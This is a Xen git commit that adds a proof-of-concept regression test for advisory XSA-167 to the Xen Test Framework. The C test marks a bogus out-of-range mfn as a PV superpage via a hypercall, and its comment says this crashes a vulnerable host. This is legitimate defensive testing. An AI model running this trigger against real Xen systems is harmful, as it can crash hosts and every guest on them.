From: Andrew Cooper <andrew.cooper3@citrix.com>
Date: Fri, 15 Jan 2016 19:41:11 +0000 (+0000)
Subject: XSA-167 Proof of Concept test
X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=a21a5683f0ce60a9e899e9ca7fa99cad78f67820;p=people%2Froyger%2Fxen-test-framework.git

XSA-167 Proof of Concept test

Introduce a brand new category called 'xsa' for dedicated XSA tests.

Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
---

diff --git a/build/common.mk b/build/common.mk
index 227e909..f9bf0c6 100644
--- a/build/common.mk
+++ b/build/common.mk
@@ -3,7 +3,7 @@ DESTDIR ?= $(ROOT)/dist
 PREFIX ?= $(ROOT)
 CC = gcc
 
-ALL_CATEGORIES     := special functional
+ALL_CATEGORIES     := special functional xsa
 
 ALL_ENVIRONMENTS   := pv64 pv32pae hvm64 hvm32pae hvm32
 
diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index 2f8c853..6b3cecf 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -17,4 +17,9 @@ and functionality.
 @section index-functional Functional tests
 
 @subpage test-swint-emulation - Software interrupt emulation for HVM guests.
+
+
+@section index-xsa XSA Proof-of-Concept tests
+
+@subpage test-xsa-167 - PV superpage sanity checks.
 */
diff --git a/tests/xsa-167/Makefile b/tests/xsa-167/Makefile
new file mode 100644
index 0000000..0a610ad
--- /dev/null
+++ b/tests/xsa-167/Makefile
@@ -0,0 +1,11 @@
+ROOT := $(abspath $(CURDIR)/../..)
+
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-167
+CATEGORY  := xsa
+TEST-ENVS := pv64
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-167/main.c b/tests/xsa-167/main.c
new file mode 100644
index 0000000..e9cda6e
--- /dev/null
+++ b/tests/xsa-167/main.c
@@ -0,0 +1,67 @@
+/**
+ * @file tests/xsa-167/main.c
+ * @ref test-xsa-167
+ *
+ * @page test-xsa-167 XSA-167
+ *
+ * Advisory: [XSA-167](http://xenbits.xen.org/xsa/advisory-167.html)
+ *
+ * The MMUEXT subops MARK_SUPER and UNMARK_SUPER do not perform a range check
+ * on the `mfn` parameter before indexing the superframe array.  They do
+ * however perform an 2MB alignment check.
+ *
+ * This PoC attempts to mark the largest possible 2MB aligned mfn,
+ * `0xffffffffffe00000`, as a superpage.  On a sample Xen, the index into the
+ * superframe array causes an attempted deference of the pointer
+ * `0x03ffffffffff8000`, suffering a @#GP fault because of being
+ * non-canonical.
+ *
+ * PV superpages are disabled by default, and must be enabled by booting Xen
+ * with the `"allowsuperpage"` command line option.
+ *
+ * If Xen is vulnerable to XSA-167, the expected outcome of this test is a
+ * host crash.  If Xen is not vulnerable, the hypercall should fail with
+ * -EINVAL.
+ *
+ * @sa tests/xsa-167/main.c
+ */
+#include <xtf/lib.h>
+
+void test_main(void)
+{
+    printk("XSA-167 PoC\n");
+
+    mmuext_op_t op =
+    {
+        .cmd = MMUEXT_MARK_SUPER,
+        .arg1.mfn = (-1ULL << L2_PT_SHIFT),
+    };
+
+    printk("  Attempting to mark mfn %#lx as a superpage\n", op.arg1.mfn);
+    int rc = hypercall_mmuext_op(&op, 1, NULL, DOMID_SELF);
+
+    switch ( rc )
+    {
+    case -ENOSYS:
+        return xtf_skip("PV superpage support not detected\n");
+
+    case -EINVAL:
+        return xtf_success("Xen correctly rejected the bogus mark attempt\n");
+
+    case 0:
+        return xtf_failure("Marking bogus superpage succeeded\n");
+
+    default:
+        return xtf_error("Unexpected error %d\n", rc);
+    }
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */